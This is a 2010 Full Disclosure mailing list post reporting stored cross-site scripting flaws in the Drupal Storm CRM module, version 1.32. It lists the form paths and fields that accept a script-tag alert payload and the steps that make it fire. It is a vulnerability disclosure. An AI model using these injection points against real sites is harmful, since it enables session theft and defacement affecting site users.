Full Disclosure mailing list archives

Drupal storm 1.32


From: Black Packeteer <black.packeteer () gmail com>
Date: Wed, 12 May 2010 15:11:13 -0400

Drupal Storm module is a CRM type module that allows you to make orgs,
people, tasks, and project.  It is used on thousands of sites according to
http://drupal.org/project/usage/storm.  Storm version 1.32 have a lots of
cross site scripting vulns.

Sploits -
*  Make or view a Storm organization at ?q=node/add/stormorganization
*  <script>alert('sploit');</script> for the Fullname, address, city, state,
phone, and taxid values
*  Save and watch scripts

*  Make new person, ?q=node/add/stormperson
*  <script>alert('sploit');</script> for the Name, enter and save it
*  Make new project at ?q=node/add/stormproject, use anything and save
*  Make new task at ?q=node/add/stormtask using this:
*  <script>alert('sploit');</script> for Step no. and Title
*  Go at ?q=node/add/stormticket
*  Change twice the 'Project:' drop-down to see js alerts

*  Make new ticket at ?q=node/add/stormticket
*  Go to Timetracking screen at ?q=node/add/stormtimetracking
*  Change the 'Project:' drop-down to view alerts
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: